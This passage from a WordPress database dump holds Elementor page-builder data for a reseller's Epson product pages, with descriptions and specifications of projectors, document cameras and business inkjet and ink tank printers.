EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7895,3471,'_elementor_version','2.5.14'),(7898,3472,'_wp_page_template','template-fullwidth.php'),(7899,3472,'_elementor_edit_mode','builder'),(7900,3472,'_elementor_template_type','post'),(7901,3472,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER 